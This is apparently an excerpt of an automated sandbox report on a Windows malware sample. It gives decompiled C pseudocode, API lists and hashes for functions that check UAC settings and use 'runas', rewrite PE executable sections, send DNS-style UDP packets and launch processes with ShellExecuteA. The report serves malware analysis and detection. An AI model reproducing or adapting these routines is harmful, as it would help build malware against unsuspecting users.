0x0040935c
0x0040935c
0x0040935c
0x0040934a
0x00409353
0x00409353
0x00409375
0x0040937d
0x0040937f
0x0040937f
0x0040938c
0x00409394
0x004093a2
0x004093d9
0x004093dc
0x004093dd
0x004093e0
0x004093e3
0x004093e6
0x004093e9
0x004093ec
0x0040940c
0x00409412
0x004093a4
0x004093a4
0x004093a5
0x004093a8
0x004093ab
0x004093ae
0x004093b1
0x004093ce
0x004093d4
0x004093d4
0x0040941d
0x00409420
0x00409425
0x0040942c
0x00409441
0x0040945d
0x0040946b
0x0040948d
0x0040949b
0x004094a0
0x004094a0
0x004094a3
0x004094b0
0x004094b3
0x0040962f
0x00409632
0x00409632
0x00409634
0x00409634
0x00409637
0x0040967b
0x00409681
0x00409682
0x00409683
0x00409683
0x0040968a
0x00409690
0x00409692
0x00409692
0x00409692
0x0040969a
0x0040969d
0x0040969d
0x004096a0
0x004096a2
0x004096a9
0x004096a9
0x00409641
0x00409648
0x0040964a
0x00409673
0x00409674
0x00000000
0x00409674
0x00409652
0x00409652
0x00409657
0x0040965c
0x00409662
0x00409666
0x00409666
0x0040962b
0x0040962b
0x00000000
0x0040962b
0x004094ce
0x004094d5
0x004094dc
0x004094e3
0x004094e8
0x004094f1
0x004094f9
0x0040951a
0x0040951f
0x00409526
0x0040952c
0x0040952e
0x00409551
0x00409556
0x0040955d
0x00409563
0x00409565
0x00409567
0x00409567
0x00409530
0x00409530
0x00409530
0x00409571
0x00409577
0x004094fb
0x004094fb
0x004094fb
0x0040957a
0x0040957f
0x0040958d
0x00000000
0x00000000
0x00409597
0x0040959a
0x0040961a
0x0040961f
0x0040961f
0x00000000
0x004095a3
0x004095c0
0x0040960c
0x00409612
0x00409625
0x00409625
0x00000000
0x00409625
0x004095d1
0x004095db
0x004095e7
0x004095ed
0x004095f3
0x004095f9
0x00409601
0x00409601
0x004095f9
0x00000000
0x004095db
0x00000000
0x00000000
0x00000000

APIs

GetVersionExA.KERNEL32(?,?,00409DD7,?,00000022,?,?,00000000,00000001), ref: 00409340
GetModuleHandleA.KERNEL32(00000000,?,00000104,?,00409DD7,?,00000022,?,?,00000000,00000001), ref: 0040936E
GetModuleFileNameA.KERNEL32(00000000,?,00409DD7,?,00000022,?,?,00000000,00000001), ref: 00409375
wsprintfA.USER32 ref: 004093CE
wsprintfA.USER32 ref: 0040940C
wsprintfA.USER32 ref: 0040948D
RegOpenKeyExA.KERNELBASE(80000002,00000000,?,?,00000000,00000101,?), ref: 004094F1
RegQueryValueExA.KERNELBASE(?,00000000,?,00000000,?,?,?,?,?,00000000,00000101,?), ref: 00409526
RegCloseKey.ADVAPI32(?,?,00000000,?,?,?,?,00000000,?,?,?,?,?,00000000,00000101,?), ref: 00409571

Strings

PromptOnSecureDesktop, xrefs: 0040938A, 0040939D, 004093BD, 004093FB, 0040941C, 0040944F, 00409478, 0040949A, 004094CD, 00409519, 00409550
runas, xrefs: 00409674

Memory Dump Source

Source File: 00000015.00000002.797152271.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.797203638.0000000000414000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_86C4.jbxd

Yara matches

Similarity

API ID: wsprintf$Module$CloseFileHandleNameOpenQueryValueVersion
String ID: PromptOnSecureDesktop$runas
API String ID: 3696105349-2220793183
Opcode ID: 4098d49489a1a58f2d44698bc399054650fb9812435130c3968b7db0ab9e05d5
Instruction ID: 7d6f16c0e63263610e399f3f049f45e0da260e43ae629b5557d7a5820381a87a
Opcode Fuzzy Hash: 4098d49489a1a58f2d44698bc399054650fb9812435130c3968b7db0ab9e05d5
Instruction Fuzzy Hash: 51A171B2540208BBEB21DFA1CC45FDF3BACAB44344F104437FA05E6192D7B999848FA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040675C, Relevance: 19.7, APIs: 13, Instructions: 199
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0040675C(CHAR* _a4, long* _a8, long _a12) {
				long _v8;
				void* _v12;
				struct _OVERLAPPED* _v16;
				long _v20;
				struct _OVERLAPPED* _v24;
				long _v28;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v60;
				void _v68;
				long _v72;
				void _v132;
				intOrPtr _v320;
				signed int _v360;
				signed int _v374;
				void _v380;
				void* _t85;
				long _t88;
				int _t92;
				long _t93;
				int _t96;
				long _t99;
				long _t102;
				struct _OVERLAPPED* _t103;
				long _t104;
				long _t115;
				long _t120;
				signed int _t143;
				void* _t146;

				_v16 = 0;
				_v8 = 0;
				if(_a12 != 0) {
					SetFileAttributesA(_a4, 0x80);
				}
				_t85 = CreateFileA(_a4, 0x80000000, 3, 0, 3, 0x80, 0); // executed
				_v12 = _t85;
				if(_t85 == 0xffffffff) {
					_v12 = CreateFileA(_a4, 0x80000000, 3, 0, 3, 4, 0);
				}
				if(_a12 != 0) {
					SetFileAttributesA(_a4, 2);
				}
				if(_v12 != 0xffffffff) {
					_t88 = GetFileSize(_v12, 0);
					_v8 = _t88;
					if(_t88 == 0xffffffff || _t88 == 0) {
						L31:
						_v8 = 0;
					} else {
						_a12 = 0;
						_v28 = 0;
						_t92 = ReadFile(_v12,  &_v132, 0x40,  &_a12, 0); // executed
						if(_t92 == 0) {
							goto L31;
						} else {
							_t93 = SetFilePointer(_v12, _v72, 0, 0); // executed
							if(_t93 == 0xffffffff) {
								goto L31;
							} else {
								_t96 = ReadFile(_v12,  &_v380, 0xf8,  &_v28, 0); // executed
								if(_t96 == 0) {
									goto L31;
								} else {
									_t99 = SetFilePointer(_v12, (_v360 & 0x0000ffff) + _v72 + 0x18, 0, 0); // executed
									if(_t99 == 0xffffffff) {
										goto L31;
									} else {
										_v20 = 0;
										_v24 = 0;
										if(0 < _v374) {
											while(1) {
												_t115 = 0x28;
												_a12 = _t115;
												if(ReadFile(_v12,  &_v68, _t115,  &_a12, 0) == 0) {
													break;
												}
												_t143 = _v374 & 0x0000ffff;
												if(_v24 != _t143 - 1) {
													_t120 = _v48 + _v52;
												} else {
													_t120 = (_v320 + _v60 - 0x00000001 &  !(_v320 - 1)) + _v48;
												}
												_a12 = _t120;
												if(_v20 < _t120) {
													_v20 = _t120;
												}
												_v24 = _v24 + 1;
												if(_v24 < _t143) {
													continue;
												} else {
												}
												goto L23;
											}
											_v8 = 0;
										}
										L23:
										if(_v24 >= (_v374 & 0x0000ffff)) {
											_t102 = _v20;
											if(_v8 > _t102) {
												_v8 = _t102;
											}
											_t103 = E0040EBCC(_v8);
											_v16 = _t103;
											if(_t103 == 0) {
												goto L31;
											} else {
												_t104 = SetFilePointer(_v12, 0, 0, 0); // executed
												if(_t104 == 0xffffffff) {
													L30:
													_v8 = 0;
													E0040EC2E(_v16);
													_v16 = 0;
												} else {
													_t146 = _v16;
													if(ReadFile(_v12, _t146, _v8,  &_v20, 0) == 0) {
														goto L30;
													} else {
														 *(((_v374 & 0x0000ffff) - 1) * 0x28 + (_v360 & 0x0000ffff) + _v72 + _t146 + 0x18 + 0x10) =  *((intOrPtr*)(((_v374 & 0x0000ffff) - 1) * 0x28 + (_v360 & 0x0000ffff) + _v72 + _t146 + 0x18 + 8)) + _v320 - 0x00000001 &  !(_v320 - 1);
														_v8 = _v20;
													}
												}
											}
										}
									}
								}
							}
						}
					}
					FindCloseChangeNotification(_v12); // executed
				}
				 *_a8 = _v8;
				return _v16;
			}

0x0040676a
0x0040676d
0x00406778
0x0040677e
0x0040677e
0x0040679a
0x0040679c
0x004067a2
0x004067b2
0x004067b2
0x004067b8
0x004067bf
0x004067bf
0x004067c9
0x004067d3
0x004067d9
0x004067df
0x0040696b
0x0040696b
0x004067ed
0x00406801
0x00406804
0x00406807
0x0040680b
0x00000000
0x00406811
0x0040681f
0x00406824
0x00000000
0x0040682a
0x0040683e
0x00406842
0x00000000
0x00406848
0x0040685c
0x00406861
0x00000000
0x00406867
0x00406869
0x0040686c
0x00406876
0x00406878
0x0040687a
0x00406881
0x0040688f
0x00000000
0x00000000
0x00406891
0x0040689e
0x004068ba
0x004068a0
0x004068b2
0x004068b2
0x004068bd
0x004068c3
0x004068c5
0x004068c5
0x004068c8
0x004068ce
0x00000000
0x00000000
0x004068d0
0x00000000
0x004068ce
0x004068d2
0x004068d2
0x004068d5
0x004068df
0x004068e5
0x004068eb
0x004068ed
0x004068ed
0x004068f3
0x004068f9
0x004068fe
0x00000000
0x00406900
0x00406906
0x0040690b
0x0040695a
0x0040695d
0x00406960
0x00406966
0x0040690d
0x0040690d
0x00406920
0x00000000
0x00406922
0x0040694f
0x00406955
0x00406955
0x00406920
0x0040690b
0x004068fe
0x004068df
0x00406861
0x00406842
0x00406824
0x0040680b
0x00406971
0x00406971
0x0040697f
0x00406986

APIs

SetFileAttributesA.KERNEL32(?,00000080,?,73B743E0,00000000), ref: 0040677E
CreateFileA.KERNELBASE(?,80000000,00000003,00000000,00000003,00000080,00000000,?,73B743E0,00000000), ref: 0040679A
CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000004,00000000,?,73B743E0,00000000), ref: 004067B0
SetFileAttributesA.KERNEL32(?,00000002,?,73B743E0,00000000), ref: 004067BF
GetFileSize.KERNEL32(000000FF,00000000,?,73B743E0,00000000), ref: 004067D3
ReadFile.KERNELBASE(000000FF,?,00000040,00408244,00000000,?,73B743E0,00000000), ref: 00406807
SetFilePointer.KERNELBASE(000000FF,?,00000000,00000000,?,73B743E0,00000000), ref: 0040681F
ReadFile.KERNELBASE(000000FF,?,000000F8,?,00000000,?,73B743E0,00000000), ref: 0040683E
SetFilePointer.KERNELBASE(000000FF,?,00000000,00000000,?,73B743E0,00000000), ref: 0040685C
ReadFile.KERNEL32(000000FF,?,00000028,00408244,00000000,?,73B743E0,00000000), ref: 0040688B
SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000000,?,73B743E0,00000000), ref: 00406906
ReadFile.KERNEL32(000000FF,004121A8,00000000,00408244,00000000,?,73B743E0,00000000), ref: 0040691C
FindCloseChangeNotification.KERNELBASE(000000FF,?,73B743E0,00000000), ref: 00406971

Part of subcall function 0040EC2E: GetProcessHeap.KERNEL32(00000000,'@,00000000,0040EA27,00000000), ref: 0040EC41
Part of subcall function 0040EC2E: HeapFree.KERNEL32(00000000), ref: 0040EC48

Memory Dump Source

Source File: 00000015.00000002.797152271.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.797203638.0000000000414000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_86C4.jbxd

Yara matches

Similarity

API ID: File$Read$Pointer$AttributesCreateHeap$ChangeCloseFindFreeNotificationProcessSize
String ID:
API String ID: 1400801100-0
Opcode ID: d05b9ef8185a7d6987771a176bb27021890da5eba797bb42cdabcd388c34deb0
Instruction ID: 23622665348289c9bdc7ba1e7bdf6275147e3319f3664adf7917ee5564634b96
Opcode Fuzzy Hash: d05b9ef8185a7d6987771a176bb27021890da5eba797bb42cdabcd388c34deb0
Instruction Fuzzy Hash: E47109B1D00219EFDB109FA5CC809EEBBB9FB04314F11457AF516B6290E7349EA2DB54

Uniqueness

Uniqueness Score: -1.00%

Function 004026FF, Relevance: 7.6, APIs: 5, Instructions: 96
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 26%

			E004026FF(intOrPtr* __eax, intOrPtr _a4, intOrPtr _a8, long _a12) {
				long* _t33;
				long _t35;
				long* _t36;
				long _t37;
				long _t38;
				short _t39;
				short _t40;
				char _t42;
				intOrPtr _t43;
				void* _t48;
				long* _t49;
				long* _t51;
				long* _t52;
				long* _t53;
				long* _t54;
				void* _t55;
				long* _t56;
				long* _t57;
				long* _t60;
				intOrPtr* _t63;
				intOrPtr* _t65;
				void* _t66;

				_t65 = __eax;
				_t33 =  *0x412bf8; // 0x0
				_t42 = 0;
				if(_t33 == 0) {
					_t33 = E0040EBCC(0x400); // executed
					_pop(_t48);
					 *0x412bf8 = _t33;
				}
				E0040EE2A(_t48, _t33, _t42, 0x400);
				_t35 = GetTickCount();
				_t49 =  *0x412bf8; // 0x0
				_t63 = __imp__#9;
				 *_t49 = _t35;
				_t36 =  *0x412bf8; // 0x0
				_t36[0] = _a12;
				_t37 =  *_t63(1);
				_t51 =  *0x412bf8; // 0x0
				_t51[1] = _t37;
				_t52 =  *0x412bf8; // 0x0
				_t38 = 0;
				_t52[1] = 0;
				_t53 =  *0x412bf8; // 0x0
				_t53[2] = 0;
				_t54 =  *0x412bf8; // 0x0
				_t54[2] = 0;
				_t60 =  *0x412bf8; // 0x0
				_t55 = 0;
				if( *_t65 != _t42) {
					do {
						_t43 =  *((intOrPtr*)(_t38 + _t65));
						_a12 = _t38;
						while(_t43 != 0) {
							if(_t43 != 0x2e) {
								_a12 = _a12 + 1;
								_t43 =  *((intOrPtr*)(_a12 + _t65));
								continue;
							}
							break;
						}
						 *((char*)(_t55 +  &(_t60[3]))) = _a12 - _t38;
						_t55 = _t55 + 1;
						while(_t38 < _a12) {
							 *((char*)(_t55 +  &(_t60[3]))) =  *((intOrPtr*)(_t38 + _t65));
							_t55 = _t55 + 1;
							_t38 = _t38 + 1;
						}
						if( *((char*)(_t38 + _t65)) == 0x2e) {
							_t38 = _t38 + 1;
						}
						_t42 = 0;
					} while ( *((intOrPtr*)(_t38 + _t65)) != 0);
				}
				 *((char*)(_t55 +  &(_t60[3]))) = _t42;
				_t24 = _t55 + 0xd; // 0xf
				_t66 = _t24;
				_t39 =  *_t63(0xf);
				_t56 =  *0x412bf8; // 0x0
				 *((short*)(_t56 + _t66)) = _t39;
				_t40 =  *_t63(1);
				_t57 =  *0x412bf8; // 0x0
				 *((short*)(_t57 + _t66 + 2)) = _t40;
				__imp__#20(_a4, 0x412bf8, _t66 + 4, _t42, _a8, 0x10);
				return 0 | _t40 <= 0x00000000;
			}

0x00402704
0x00402706
0x0040270b
0x00402715
0x00402718
0x0040271d
0x0040271e
0x0040271e
0x00402726
0x0040272e
0x00402734
0x0040273a
0x00402740
0x00402743
0x0040274e
0x00402752
0x00402754
0x0040275a
0x0040275e
0x00402764
0x00402766
0x0040276a
0x00402770
0x00402774
0x0040277a
0x0040277e
0x00402784
0x00402788
0x0040278a
0x0040278a
0x0040278d
0x004027a0
0x00402795
0x00402797
0x0040279d
0x00000000
0x0040279d
0x00000000
0x00402795
0x004027a9
0x004027ad
0x004027b9
0x004027b3
0x004027b7
0x004027b8
0x004027b8
0x004027c2
0x004027c4
0x004027c4
0x004027c5
0x004027c7
0x0040278a
0x004027ce
0x004027d2
0x004027d2
0x004027d5
0x004027d7
0x004027df
0x004027e3
0x004027e5
0x004027f0
0x00402802
0x00402815

APIs

GetTickCount.KERNEL32 ref: 0040272E
htons.WS2_32(00000001), ref: 00402752
htons.WS2_32(0000000F), ref: 004027D5
htons.WS2_32(00000001), ref: 004027E3
sendto.WS2_32(?,00412BF8,00000009,00000000,00000010,00000010), ref: 00402802

Part of subcall function 0040EBCC: GetProcessHeap.KERNEL32(00000000,00000000,80000001,0040EBFE,7FFF0001,?,0040DB55,7FFF0001), ref: 0040EBD3
Part of subcall function 0040EBCC: RtlAllocateHeap.NTDLL(00000000,?,0040DB55,7FFF0001), ref: 0040EBDA

Memory Dump Source

Source File: 00000015.00000002.797152271.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.797203638.0000000000414000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_86C4.jbxd

Yara matches

Similarity

API ID: htons$Heap$AllocateCountProcessTicksendto
String ID:
API String ID: 1128258776-0
Opcode ID: 6299894b8f3bc0cc0dfae645a3d09159b09bee40e3d6069153e68f679ff52250
Instruction ID: e317574a351225f02cdc10e669db3389ba019fd1a924c3d0ab3f78f3d9a30560
Opcode Fuzzy Hash: 6299894b8f3bc0cc0dfae645a3d09159b09bee40e3d6069153e68f679ff52250
Instruction Fuzzy Hash: B8313A342483969FD7108F74DD80AA27760FF19318B19C07EE855DB3A2D6B6E892D718

Uniqueness

Uniqueness Score: -1.00%

Function 004099D2, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 54
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 46%

			E004099D2(int __edx, void* __eflags, CHAR* _a4, CHAR* _a8, CHAR* _a12, intOrPtr _a16, int _a20) {
				signed int _t14;
				void* _t21;
				CHAR* _t22;
				void* _t24;
				int _t25;

				_t25 = __edx;
				_t22 = _a8;
				lstrcpyA(_t22, _a4);
				E00408274(_t22);
				_push(0);
				_push(_a12);
				_t14 = E00406C6F((E0040ECA5() & 0x0000000f) << 0x00000014 | 0x00006108);
				_pop(_t24);
				_push(_t14 ^ 0x61616161);
				E0040F133();
				lstrcatA(_a12, E00402544(0x4122f8, 0x410694, 5, 0xe4, 0xc8));
				E0040EE2A(_t24, 0x4122f8, 0, 0x100);
				lstrcatA(_t22, _a12);
				_t21 = E00406A60(_t25, _t22, _a16, _a20); // executed
				return _t21;
			}

0x004099d2
0x004099d6
0x004099df
0x004099e6
0x004099ec
0x004099ee
0x00409a02
0x00409a07
0x00409a0d
0x00409a0e
0x00409a3c
0x00409a46
0x00409a52
0x00409a5b
0x00409a67

APIs

lstrcpyA.KERNEL32(?,?,00000100,PromptOnSecureDesktop,00000000,?,00409E9D,?,00000022,?,?,?,?,?,?,?), ref: 004099DF
lstrcatA.KERNEL32(00000022,00000000,?,?,00409E9D,?,00000022,?,?,?,?,?,?,?,000001F4), ref: 00409A3C
lstrcatA.KERNEL32(?,00000022,?,?,?,?,?,00409E9D,?,00000022,?,?,?), ref: 00409A52

Part of subcall function 00406A60: CreateFileA.KERNELBASE(?,40000000,00000000,00000000,00000002,00000080,00000000,73BB81D0,?,?,?,?,00409A60,?,?,00409E9D), ref: 00406A7D
Part of subcall function 00406A60: GetDiskFreeSpaceA.KERNELBASE(00409E9D,00409A60,?,?,?,PromptOnSecureDesktop,?,?,?,00409A60,?,?,00409E9D), ref: 00406ABB
Part of subcall function 00406A60: GetLastError.KERNEL32(?,?,?,?,?,?,?,00409A60,?,?,00409E9D), ref: 00406B40
Part of subcall function 00406A60: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00409A60,?,?,00409E9D), ref: 00406B4E
Part of subcall function 00406A60: DeleteFileA.KERNEL32(?,?,?,?,?,?,?,?,00409A60,?,?,00409E9D), ref: 00406B80

Strings

PromptOnSecureDesktop, xrefs: 004099D9, 00409A24, 00409A29, 00409A45

Memory Dump Source

Source File: 00000015.00000002.797152271.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.797203638.0000000000414000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_86C4.jbxd

Yara matches

Similarity

API ID: Filelstrcat$CloseCreateDeleteDiskErrorFreeHandleLastSpacelstrcpy
String ID: PromptOnSecureDesktop
API String ID: 4131120076-2980165447
Opcode ID: cb8d8b12221011c2ecefbb9c2a5bdb301364e629a1ff96e5c87c413b5c368032
Instruction ID: 3080a8c352511dab3afe6aac1e5f9bdd01cc5e55c8c8f00722b444f0ba2a7742
Opcode Fuzzy Hash: cb8d8b12221011c2ecefbb9c2a5bdb301364e629a1ff96e5c87c413b5c368032
Instruction Fuzzy Hash: D6018F7294020877EE106F62AC47F9F3E1DEB54718F04883AF619790D2D9BA94709A6C

Uniqueness

Uniqueness Score: -1.00%

Function 00404000, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35
sleepfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00404000(CHAR* _a4, signed int* _a8) {
				void* _t3;
				long _t6;
				void* _t8;
				signed int* _t9;

				_t9 = _a8;
				_t8 = 0;
				 *_t9 =  *_t9 | 0xffffffff;
				while(1) {
					_t3 = CreateFileA(_a4, 0xc0000000, 3, 0, 3, 0x40000080, 0); // executed
					if(_t3 != 0xffffffff) {
						break;
					}
					_t6 = GetLastError();
					if(_t6 == 2 || _t6 == 3) {
						L6:
						return 0;
					} else {
						if(_t6 == 5) {
							L9:
							return 1;
						}
						Sleep(0x1f4);
						_t8 = _t8 + 1;
						if(_t8 < 0xa) {
							continue;
						}
						goto L6;
					}
				}
				 *_t9 = _t3;
				goto L9;
			}

0x00404001
0x00404006
0x00404008
0x0040400b
0x00404021
0x0040402a
0x00000000
0x00000000
0x0040402c
0x00404035
0x00404052
0x00000000
0x0040403c
0x0040403f
0x00404059
0x00000000
0x0040405b
0x00404046
0x0040404c
0x00404050
0x00000000
0x00000000
0x00000000
0x00404050
0x00404035
0x00404057
0x00000000

APIs

CreateFileA.KERNELBASE(40000080,C0000000,00000003,00000000,00000003,40000080,00000000,00000001,PromptOnSecureDesktop,004042B6,00000000,00000001,PromptOnSecureDesktop,00000000,?,004098FD), ref: 00404021
GetLastError.KERNEL32(?,004098FD,00000001,00000100,PromptOnSecureDesktop,0040A3C7), ref: 0040402C
Sleep.KERNEL32(000001F4,?,004098FD,00000001,00000100,PromptOnSecureDesktop,0040A3C7), ref: 00404046

Strings

PromptOnSecureDesktop, xrefs: 00404000

Memory Dump Source

Source File: 00000015.00000002.797152271.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.797203638.0000000000414000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_86C4.jbxd

Yara matches

Similarity

API ID: CreateErrorFileLastSleep
String ID: PromptOnSecureDesktop
API String ID: 408151869-2980165447
Opcode ID: 6f680220710ad79833a0587a74a8d4d803d4b32c880204d479e51cf724750932
Instruction ID: 3804347f6bd7ba573f3b83e06e35dce69dd086f5e0a34025cfebbc3953b0dfe0
Opcode Fuzzy Hash: 6f680220710ad79833a0587a74a8d4d803d4b32c880204d479e51cf724750932
Instruction Fuzzy Hash: 05F0A771240101AAD7311B24BC49B5B36A1DBC6734F258B76F3B5F21E0C67458C19B1D

Uniqueness

Uniqueness Score: -1.00%

Function 00406987, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 92
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 97%

			E00406987(void* __ecx, void* _a4, void* _a8, intOrPtr _a12, signed int _a16) {
				long _v8;
				long _v12;
				signed int _t50;
				int _t52;
				signed int _t53;
				int _t59;
				signed int _t60;
				long _t68;
				signed int _t74;
				void* _t78;
				void* _t85;

				_t78 = _a8;
				_t48 =  *((intOrPtr*)(_t78 + 0x3c)) + _t78;
				_t7 =  &_a16; // 0x406b2c
				_t85 = (( *( *((intOrPtr*)(_t78 + 0x3c)) + _t78 + 6) & 0x0000ffff) - 1) * 0x28 + ( *(_t48 + 0x14) & 0x0000ffff) + _t48 + 0x18;
				_t68 =  *(_t85 + 0x14);
				_t50 =  *_t7 - _t68;
				_v8 = _t50;
				if(_t68 >= _a12) {
					L5:
					_a16 = _a16 & 0x00000000;
				} else {
					_t74 =  *(_t85 + 0x10);
					if(_t74 == 0) {
						goto L5;
					} else {
						_v12 = _t74;
						_a16 = _t50 / _t74;
						if(_a16 < 1) {
							_a16 = 1;
						}
						_t20 =  &_a16; // 0x406b2c
						 *(_t85 + 0x10) =  *_t20 * _t74;
					}
				}
				_v8 = _v8 & 0x00000000;
				_t52 = WriteFile(_a4, _t78, _t68,  &_v8, 0); // executed
				if(_t52 == 0 || _v8 != _t68) {
					if(_a16 != 0) {
						 *(_t85 + 0x10) = _v12;
					}
					_t53 = 0;
				} else {
					if(_a16 == 0) {
						L13:
						_t53 = _t68;
					} else {
						 *(_t85 + 0x10) = _v12;
						while(1) {
							_v8 = _v8 & 0x00000000;
							_t59 = WriteFile(_a4, _a8 +  *(_t85 + 0x14), _v12,  &_v8, 0); // executed
							_t60 = _v8;
							if(_t59 == 0 || _t60 != _v12) {
								break;
							}
							_t68 = _t68 + _t60;
							_t41 =  &_a16;
							 *_t41 = _a16 - 1;
							if( *_t41 != 0) {
								continue;
							} else {
								goto L13;
							}
							goto L18;
						}
						asm("sbb eax, eax");
						_t53 =  !_t60 & _t68 + _t60;
					}
				}
				L18:
				return _t53;
			}

0x0040698f
0x00406995
0x004069a7
0x004069aa
0x004069ac
0x004069af
0x004069b1
0x004069b7
0x004069e0
0x004069e0
0x004069b9
0x004069b9
0x004069be
0x00000000
0x004069c0
0x004069c4
0x004069c7
0x004069d0
0x004069d2
0x004069d2
0x004069d5
0x004069db
0x004069db
0x004069be
0x004069e4
0x004069f9
0x004069fd
0x00406a51
0x00406a56
0x00406a56
0x00406a59
0x00406a04
0x00406a08
0x00406a3c
0x00406a3c
0x00406a0a
0x00406a0d
0x00406a10
0x00406a10
0x00406a27
0x00406a2b
0x00406a2e
0x00000000
0x00000000
0x00406a35
0x00406a37
0x00406a37
0x00406a3a
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406a3a
0x00406a45
0x00406a49
0x00406a49
0x00406a08
0x00406a5b
0x00406a5f

APIs

WriteFile.KERNELBASE(00409A60,?,?,00000000,00000000,00409A60,?,00000000), ref: 004069F9
WriteFile.KERNELBASE(00409A60,?,00409A60,00000000,00000000), ref: 00406A27

Strings

,k@, xrefs: 004069A7, 004069D5

Memory Dump Source

Source File: 00000015.00000002.797152271.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.797203638.0000000000414000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_86C4.jbxd

Yara matches

Similarity

API ID: FileWrite
String ID: ,k@
API String ID: 3934441357-1053005162
Opcode ID: e4aff9389b963f63373f6495f6f2d31144d691977fa3f05a849364ed3536fcbf
Instruction ID: 2e4882fff751b5905bcc38bfa2cd4d67bf9c642b42fdf425c00f27fbfd993b21
Opcode Fuzzy Hash: e4aff9389b963f63373f6495f6f2d31144d691977fa3f05a849364ed3536fcbf
Instruction Fuzzy Hash: 3A313A72A00209EFDB24DF58D984BAA77F4EB44315F12847AE802F7680D374EE64CB65

Uniqueness

Uniqueness Score: -1.00%

Function 0040EC54, Relevance: 4.5, APIs: 3, Instructions: 24
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0040EC54() {
				long _v8;
				struct _FILETIME _v16;
				signed int _t11;

				GetSystemTimeAsFileTime( &_v16);
				GetVolumeInformationA(0, 0, 4,  &_v8, 0, 0, 0, 0); // executed
				_t11 = (GetTickCount() ^ _v16.dwHighDateTime ^ _v8) & 0x7fffffff;
				 *0x4136cc = _t11;
				return _t11;
			}

0x0040ec5e
0x0040ec72
0x0040ec84
0x0040ec89
0x0040ec8f

APIs

GetSystemTimeAsFileTime.KERNEL32(?), ref: 0040EC5E
GetVolumeInformationA.KERNELBASE(00000000,00000000,00000004,?,00000000,00000000,00000000,00000000), ref: 0040EC72
GetTickCount.KERNEL32 ref: 0040EC78

Memory Dump Source

Source File: 00000015.00000002.797152271.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.797203638.0000000000414000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_86C4.jbxd

Yara matches

Similarity

API ID: Time$CountFileInformationSystemTickVolume
String ID:
API String ID: 1209300637-0
Opcode ID: 317f96d9bc7de3e67904a91eb6120da1bd741d4a36fd8a43a77db32c5f55538a
Instruction ID: 1673bc13977c8672636575d9c8a2f9c2942a42ce341afdc75306ae3be589e196
Opcode Fuzzy Hash: 317f96d9bc7de3e67904a91eb6120da1bd741d4a36fd8a43a77db32c5f55538a
Instruction Fuzzy Hash: 6BE0BFF5810104FFEB11EBB0EC4EEBB7BBCFB08315F504661B915D6090DAB49A448B64

Uniqueness

Uniqueness Score: -1.00%

Function 004091EB, Relevance: 3.1, APIs: 2, Instructions: 119
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E004091EB(char* _a4, char* _a8) {
				signed int _v8;
				signed int _v12;
				char _v524;
				char _t24;
				char* _t25;
				void* _t27;
				intOrPtr* _t29;
				char* _t31;
				char _t34;
				intOrPtr _t40;
				void* _t41;
				char* _t42;
				void* _t44;
				void* _t45;
				void* _t46;

				_v12 = _v12 & 0x00000000;
				_t42 = _a8;
				_v8 = 0x10;
				if( *_t42 == 0) {
					L33:
					return _v12;
				} else {
					goto L1;
				}
				do {
					L1:
					_t31 = E0040ED03(_t42, 0xd);
					if(_t31 != 0) {
						L6:
						_t44 = _t31 - _t42;
						if(_t44 >= 0x200) {
							_t44 = 0x1ff;
						}
						E0040EE08( &_v524, _t42, _t44);
						_t46 = _t46 + 0xc;
						 *((char*)(_t45 + _t44 - 0x208)) = 0;
						if(_v524 == 0) {
							goto L27;
						} else {
							_t25 =  &_v524;
							if(_v524 != 0x20) {
								L16:
								while( *_t25 == 0x22) {
									while(1) {
										_t25 =  &(_t25[1]);
										_t34 =  *_t25;
										if(_t34 == 0) {
											break;
										}
										if(_t34 == 0x22) {
											L15:
											_t25 =  &(_t25[1]);
											goto L16;
										}
									}
									if(_t34 != 0x22) {
										L20:
										while( *_t25 != 0) {
											if( *_t25 == 0x20) {
												L22:
												 *_t25 = 0;
												do {
													_t25 =  &(_t25[1]);
												} while ( *_t25 == 0x20);
												L26:
												_t27 = ShellExecuteA(0, _a4,  &_v524, _t25, 0, 0); // executed
												_v12 = _t27;
												if(_t27 != 0x2a) {
													 *0x412180 = _v8 | 0x61080100;
